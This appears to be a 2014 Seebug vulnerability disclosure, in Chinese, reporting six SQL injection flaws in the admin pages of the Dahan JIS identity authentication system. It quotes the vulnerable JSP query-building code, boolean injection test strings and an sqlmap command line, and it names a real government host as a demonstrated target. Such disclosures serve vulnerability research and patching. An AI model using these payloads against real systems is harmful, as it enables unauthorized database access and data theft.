大汉版通JIS统一身份认证系统系统多处SQL注入

2014-01-27T00:00:00
ID SSV:93880
Type seebug
Reporter Root
Modified 2014-01-27T00:00:00

Description

简要描述:

只是冲着数量来的。后台SQL注入,有点怀疑是实习程序员……临时工的作品?

详细说明:

后台SQL1 第一个先拿一个麻烦一点的来演示,后面的同理 需要有应用管理员或者系统管理员的权限登录。 /jis/manage/datasbase/que_datasbase.jsp

if (que_keywords.length() > 0) { strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords + "%'"); }

为了配合工具利用,需要先新增监听管理: http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&

<img src="https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png" alt="image025.png" width="600" onerror="javascript:errimg(this);">

只要是公网可以访问的IP,而且用户名、密码是对的就行了。否则会提示无法连接之类的

<img src="https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png" alt="image027.png" width="600" onerror="javascript:errimg(this);">

添加了之后就有作为标识用的字符串出来了 在搜索框内输入' and '%'=' 页面没有变化

<img src="https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png" alt="image029.png" width="600" onerror="javascript:errimg(this);">

输入' and '1'=',页面变化了

<img src="https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png" alt="image031.png" width="600" onerror="javascript:errimg(this);">

带上cookie丢工具吧 Sqlmap配置data的时候这样来比较好:--data "que_keywords=' * and '%'='"

<img src="https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png" alt="image033.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png" alt="image035.png" width="600" onerror="javascript:errimg(this);">

后台SQL2 jis/manage/app/que_application.jsp

if (que_keywords.length() &gt; 0) { strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords+ "%' OR vc_appmark LIKE '%" + que_keywords+ "%'"); }

权限要求同上 照旧,搜索处输入' and '%'='

<img src="https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png" alt="image037.png" width="600" onerror="javascript:errimg(this);">

' and '1'='

<img src="https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png" alt="image039.png" width="600" onerror="javascript:errimg(this);">

工具利用方法类似上一个。 后台SQL3 jis/sys/user/que_userginfo.jsp 类似上两个漏洞

if(que_keywords.length()&gt;0) strSqlCondition.append(" AND vc_usergroupname like '%"+que_keywords+ "%' OR vc_groupallname like '%"+que_keywords+"%'");

搜索输入 ' and '%'=' 搜索出所有结果:

<img src="https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png" alt="image041.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

后台SQL4 jis/manage/role/que_approleinfo.jsp

if(que_keywords.length()&gt;0) { strSqlCondition.append(" AND vc_rolename like '%"+que_keywords+"%'"); } if(que_webid.length()&gt;0) { strSqlCondition.append(" AND i_webid = '"+que_webid+"'"); }

输入' and '%'='

<img src="https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png" alt="image043.png" width="600" onerror="javascript:errimg(this);">

' and '%'='1

<img src="https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png" alt="image045.png" width="600" onerror="javascript:errimg(this);">

后台SQL5 jis/manage/log/que_log.jsp

if(que_keywords.length()&gt;0){ strSqlCondition.append(" AND vc_operatecontent like '%"+que_keywords+"%' OR c_userid like '%"+que_keywords+"%' OR vc_modulename like '%"+que_keywords+"%' OR vc_state like '%"+que_keywords+"%' "); }

搜索输入 admin%' or '%'=' 出来全部结果:

<img src="https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png" alt="image047.png" width="600" onerror="javascript:errimg(this);">

改为admin%' and '%'=' 则只出现admin的日志:

<img src="https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png" alt="image049.png" width="600" onerror="javascript:errimg(this);">

后台SQL6 jis/manage/sysview/que_sysview.jsp 输入fgj' or '%'='

<img src="https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png" alt="image051.png" width="600" onerror="javascript:errimg(this);">